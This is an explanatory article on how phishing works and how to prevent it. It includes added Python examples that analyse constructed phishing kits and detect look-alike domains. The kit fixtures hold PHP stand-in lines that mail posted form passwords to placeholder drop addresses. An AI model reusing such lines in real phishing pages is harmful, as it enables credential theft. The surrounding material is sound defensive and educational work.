What is phishing? How this cyber attack works and how to prevent it

Phishing is a method of trying to gather personal information using deceptive e-mails and websites. Here's what you need to know about this venerable, but increasingly sophisticated, form of cyber attack.

[Image: a hook cast at a laptop email with fishing lures amid abstract data. CHUYN / Getty Images]

Phishing definition

Phishing is a cyber attack that uses disguised email as a weapon. The goal is to trick the email recipient into believing that the message is something they want or need — a request from their bank, for instance, or a note from someone in their company — and to click a link or download an attachment.

What really distinguishes phishing is the form the message takes: the attackers masquerade as a trusted entity of some kind, often a real or plausibly real person, or a company the victim might do business with. It's one of the oldest types of cyberattacks, dating back to the 1990s, and it's still one of the most widespread and pernicious, with phishing messages and techniques becoming increasingly sophisticated.

"Phish" is pronounced just like it's spelled, which is to say like the word "fish" — the analogy is of an angler throwing a baited hook out there (the phishing email) and hoping you bite. The term arose in the mid-1990s among hackers aiming to trick AOL users into giving up their login information. The "ph" is part of a tradition of whimsical hacker spelling, and was probably influenced by the term "phreaking," short for "phone phreaking," an early form of hacking that involved playing sound tones into telephone handsets to get free phone calls.

Nearly a third of all breaches in the past year involved phishing, according to the 2019 Verizon Data Breach Investigations Report. For cyber-espionage attacks, that number jumps to 78%. The worst phishing news for 2019 is that its perpetrators are getting much, much better at it thanks to well-produced, off-the-shelf tools and templates.

Some phishing scams have succeeded well enough to make waves:

  • Perhaps one of the most consequential phishing attacks in history happened in 2016, when hackers managed to get Hillary Clinton campaign chair John Podesta to offer up his Gmail password.
  • The "fappening" attack, in which intimate photos of a number of celebrities were made public, was originally thought to be a result of insecurity on Apple's iCloud servers, but was in fact the product of a number of successful phishing attempts.
  • In 2016, employees at the University of Kansas responded to a phishing email and handed over access to their paycheck deposit information, resulting in them losing pay.

What is a phishing kit?

The availability of phishing kits makes it easy for cyber criminals, even those with minimal technical skills, to launch phishing campaigns. A phishing kit bundles phishing website resources and tools that need only be installed on a server. Once installed, all the attacker needs to do is send out emails to potential victims. Phishing kits as well as mailing lists are available on the dark web. A couple of sites, Phishtank and OpenPhish, keep crowd-sourced lists of known phishing kits.

Some phishing kits allow attackers to spoof trusted brands, increasing the chances of someone clicking on a fraudulent link. Akamai's research provided in its Phishing--Baiting the Hook report found 62 kit variants for Microsoft, 14 for PayPal, seven for DHL, and 11 for Dropbox.

The Duo Labs report, Phish in a Barrel, includes an analysis of phishing kit reuse. Of the 3,200 phishing kits that Duo discovered, 900 (27%) were found on more than one host. That number might actually be higher, however. "Why don't we see a higher percentage of kit reuse? Perhaps because we were measuring based on the SHA1 hash of the kit contents. A single change to just one file in the kit would appear as two separate kits even when they are otherwise identical," said Jordan Wright, a senior R&D engineer at Duo and the report's author.

[Infographic: Anatomy of a Phishing Kit, by Duo Security]

Analyzing phishing kits allows security teams to track who is using them. "One of the most useful things we can learn from analyzing phishing kits is where credentials are being sent. By tracking email addresses found in phishing kits, we can correlate actors to specific campaigns and even specific kits," said Wright in the report. "It gets even better. Not only can we see where credentials are sent, but we also see where credentials claim to be sent from. Creators of phishing kits commonly use the 'From' header like a signing card, letting us find multiple kits created by the same author."
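To make Wright's two points concrete, here is an added Python example (not Duo's tooling or code from the report). It hashes a constructed kit two ways, showing why a single changed file defeats a whole-kit SHA1 match while per-file hashes still reveal reuse, and it pulls out the addresses where credentials are sent and the 'From' address the kit author set. The kit files are constructed stand-ins, not real kit code.

```python
import hashlib
import re
from typing import Dict, Set

# Constructed stand-ins for unpacked phishing kits (path -> file contents). Not real kit code.
KIT_A = {
    "index.php": "<?php include 'post.php'; ?><form method='post'>...</form>",
    "post.php": "<?php mail('drop-a@example.invalid', 'r', $_POST['p'], 'From: author@example.invalid'); ?>",
    "css/style.css": "body { background: #fff; }",
}
# KIT_B is KIT_A re-deployed with only the drop address edited
KIT_B = dict(KIT_A)
KIT_B["post.php"] = KIT_A["post.php"].replace("drop-a@", "drop-b@")
# KIT_C is an unrelated kit
KIT_C = {
    "login.html": "<html>another brand</html>",
    "send.php": "<?php mail('other@example.invalid', 's', $_POST['q'], 'From: someone@example.invalid'); ?>",
}

def kit_hash(kit: Dict[str, str]) -> str:
    """One SHA1 over the whole kit (sorted paths and contents): the whole-kit view Wright describes."""
    h = hashlib.sha1()
    for path in sorted(kit):
        h.update(path.encode() + b"\0" + kit[path].encode() + b"\0")
    return h.hexdigest()

def file_hashes(kit: Dict[str, str]) -> Set[str]:
    """SHA1 of each file on its own, so kits can be compared file by file."""
    return {hashlib.sha1(content.encode()).hexdigest() for content in kit.values()}

def similarity(a: Dict[str, str], b: Dict[str, str]) -> float:
    """Jaccard overlap of the two kits' per-file hash sets (1.0 = same files, 0.0 = nothing shared)."""
    ha, hb = file_hashes(a), file_hashes(b)
    return len(ha & hb) / len(ha | hb)

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")

def addresses(kit: Dict[str, str]) -> Set[str]:
    """Every email address in the kit: drop addresses credentials go to, plus the 'From' the author set."""
    return {m for content in kit.values() for m in EMAIL_RE.findall(content)}

if __name__ == "__main__":
    print("same whole-kit hash:", kit_hash(KIT_A) == kit_hash(KIT_B))          # False: one file differs
    print("A~B:", similarity(KIT_A, KIT_B), "A~C:", similarity(KIT_A, KIT_C))  # 0.5 and 0.0
    print("shared address:", addresses(KIT_A) & addresses(KIT_B))             # the author's 'From'
```

The whole-kit hashes of KIT_A and KIT_B differ, so a SHA1-only count would record them as two kits; the per-file overlap and the shared 'From' address both tie them back to one author.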

Types of phishing

If there's a common denominator among phishing attacks, it's the disguise. The attackers spoof their email address so it looks like it's coming from someone else, set up fake websites that look like ones the victim trusts, and use foreign character sets to disguise URLs.

That said, there are a variety of techniques that fall under the umbrella of phishing. There are a couple of different ways to break attacks down into categories. One is by the purpose of the phishing attempt. Generally, a phishing campaign tries to get the victim to do one of two things:

  • Hand over sensitive information. These messages aim to trick the user into revealing important data — often a username and password that the attacker can use to breach a system or account. The classic version of this scam involves sending out an email tailored to look like a message from a major bank; by spamming out the message to millions of people, the attackers ensure that at least some of the recipients will be customers of that bank. The victim clicks on a link in the message and is taken to a malicious site designed to resemble the bank's webpage, and then hopefully enters their username and password. The attacker can now access the victim's account.
  • Download malware. Like a lot of spam, these types of phishing emails aim to get the victim to infect their own computer with malware. Often the messages are "soft targeted" — they might be sent to an HR staffer with an attachment that purports to be a job seeker's resume, for instance. These attachments are often .zip files, or Microsoft Office documents with malicious embedded code. The most common form of malicious code is ransomware — in 2017 it was estimated that 93% of phishing emails contained ransomware attachments.

Phishing emails can be targeted in several different ways. As we noted, sometimes they aren't targeted at all; emails are sent to millions of potential victims to try to trick them into logging in to fake versions of very popular websites. Ironscales has tallied the most popular brands that hackers use in their phishing attempts.

Of the 50,000-plus fake login pages the company monitored, these were the top brands attackers used:

  • PayPal: 22%
  • Microsoft: 19%
  • Facebook: 15%
  • eBay: 6%
  • Amazon: 3%

Other times, attackers might send "soft targeted" emails at someone playing a particular role in an organization, even if they don't know anything about them personally. Some phishing attacks aim to get login information from, or infect the computers of, specific people. Attackers dedicate much more energy to tricking those victims, who have been selected because the potential rewards are quite high.

Spear phishing

When attackers try to craft a message to appeal to a specific individual, that's called spear phishing. (The image is of a fisherman aiming for one specific fish, rather than just casting a baited hook in the water to see who bites.) Phishers identify their targets (sometimes using information on sites like LinkedIn) and use spoofed addresses to send emails that could plausibly look like they're coming from co-workers. For instance, the spear phisher might target someone in the finance department and pretend to be the victim's manager requesting a large bank transfer on short notice.

Whaling

Whale phishing, or whaling, is a form of spear phishing aimed at the very big fish — CEOs or other high-value targets. Many of these scams target company board members, who are considered especially vulnerable: they have a great deal of authority within a company, but since they aren't full-time employees, they often use personal email addresses for business-related correspondence, which doesn't have the protections offered by corporate email.

Gathering enough information to trick a really high-value target might take time, but it can have a surprisingly high payoff. In 2008, cybercriminals targeted corporate CEOs with emails that claimed to have FBI subpoenas attached. In fact, they downloaded keyloggers onto the executives' computers — and the scammers' success rate was 10%, snagging almost 2,000 victims.

Other types of phishing include clone phishing, vishing, and snowshoeing. This article explains the differences between the various types of phishing attacks.

Why phishing increases during a crisis

Criminals rely on deception and creating a sense of urgency to achieve success with their phishing campaigns. Crises such as the coronavirus pandemic give those criminals a big opportunity to lure victims into taking their phishing bait.

During a crisis, people are on edge. They want information and are looking for direction from their employers, the government, and other relevant authorities. An email that appears to be from one of these entities and promises new information or instructs recipients to complete a task quickly will likely receive less scrutiny than prior to the crisis. An impulsive click later, and the victim's device is infected or account is compromised.

The following screen capture is a phishing campaign discovered by Mimecast that attempts to steal login credentials of the victim's Microsoft OneDrive account. The attacker knew that with more people working from home, sharing of documents via OneDrive would be common.

[Screenshot: Mimecast work-from-home phishing campaign. Mimecast]

The next two screens are from phishing campaigns identified by Proofpoint. The first asks victims to load an app on their device to "run simulations of the cure" for COVID-19. The app, of course, is malware. The second appears to be from Canada's Public Health Agency and asks recipients to click on a link to read an important letter. The link goes to a malicious document.

[Screenshot: malicious spoofed foldinghome email with link to malware. Proofpoint]
[Screenshot: fake Public Health Agency of Canada lure. Proofpoint]

How to prevent phishing

The best way to learn to spot phishing emails is to study examples captured in the wild! This webinar from Cyren starts with a look at a real live phishing website, masquerading as a PayPal login, tempting victims to hand over their credentials. Check out the first minute or so of the video to see the telltale signs of a phishing website.

More examples can be found on a website maintained by Lehigh University's technology services department, where they keep a gallery of recent phishing emails received by students and staff.

[ See 15 real-world phishing examples — and how to recognize them ]

There also are a number of steps you can take and mindsets you should get into that will keep you from becoming a phishing statistic, including:

  • Always check the spelling of the URLs in email links before you click or enter sensitive information
  • Watch out for URL redirects, where you're subtly sent to a different website with identical design
  • If you receive an email from a source you know but it seems suspicious, contact that source with a new email, rather than just hitting reply
  • Don't post personal data, like your birthday, vacation plans, or your address or phone number, publicly on social media
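The URL-spelling check above, and the foreign-character-set trick mentioned earlier, can be automated before a user ever clicks. The Python below is an added example, not code from the article or from any vendor it names; the brand watch-list (taken from the Ironscales top five), the sample links and the small confusable-character table are all constructed for illustration.

```python
from difflib import SequenceMatcher
from urllib.parse import urlsplit

# Constructed watch-list: the brands most often imitated in the fake login pages counted above.
TRUSTED = {"paypal.com", "microsoft.com", "facebook.com", "ebay.com", "amazon.com"}

# Illustrative subset of characters that render like Latin letters: Cyrillic homoglyphs and digits.
CONFUSABLES = {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
               "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0455": "s",   # Cyrillic а е о р с у х і ѕ
               "1": "l", "0": "o"}                                             # digits used as letters

def registrable_domain(url: str) -> str:
    """Lower-cased last two host labels, with any punycode (xn--) label decoded back to Unicode."""
    host = (urlsplit(url).hostname or "").lower()
    try:
        host = host.encode("ascii").decode("idna")   # e.g. 'xn--...' -> the Unicode host it hides
    except UnicodeError:
        pass                                          # host already contains Unicode: nothing to decode
    return ".".join(host.split(".")[-2:])

def skeleton(domain: str) -> str:
    """Normalise look-alike characters so 'paypa1', Cyrillic 'pаypal' and 'rnicrosoft' read as the brand."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in domain).replace("rn", "m")

def check_link(url: str) -> dict:
    """Classify a link target as trusted, a look-alike of a trusted brand, or unknown."""
    domain = registrable_domain(url)
    non_ascii = any(ord(ch) > 127 for ch in domain)   # mixed or foreign script in the host
    imitates = None
    if domain in TRUSTED:
        verdict = "trusted"
    else:
        skel = skeleton(domain)
        matches = [t for t in TRUSTED if skel == t or SequenceMatcher(None, skel, t).ratio() >= 0.8]
        imitates = sorted(matches)[0] if matches else None
        verdict = "lookalike" if matches else "unknown"
    return {"domain": domain, "non_ascii": non_ascii, "verdict": verdict, "imitates": imitates}

# Constructed sample links; the punycode host is built from 'p' + Cyrillic а (U+0430) + 'ypal'.
PUNYCODE_URL = "https://" + "p\u0430ypal.com".encode("idna").decode("ascii") + "/signin"
SAMPLES = ["https://www.paypal.com/signin", "http://paypa1.com/login",
           "http://rnicrosoft.com/owa", PUNYCODE_URL, "https://example.org/"]

if __name__ == "__main__":
    for link in SAMPLES:
        print(link, check_link(link))
```

A real deployment would use a public-suffix list rather than the last two labels and a full confusables table, but the flow is the same: decode, normalise, then compare against the brands your users actually log in to.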
[Infographic: Q1 2019 KnowBe4 phishing infographic. KnowBe4]

These are the top-clicked phishing messages according to a Q2 2018 report from security awareness training company KnowBe4.

If you work in your company's IT security department, you can implement proactive measures to protect the organization, including:

  • "Sandboxing" inbound email, checking the safety of each link a user clicks
  • Inspecting and analyzing web traffic
  • Pen-testing your organization to find weak spots and using the results to educate employees
  • Rewarding good behavior, perhaps by showcasing a "catch of the day" if someone spots a phishing email

Copyright © 2020 IDG Communications, Inc.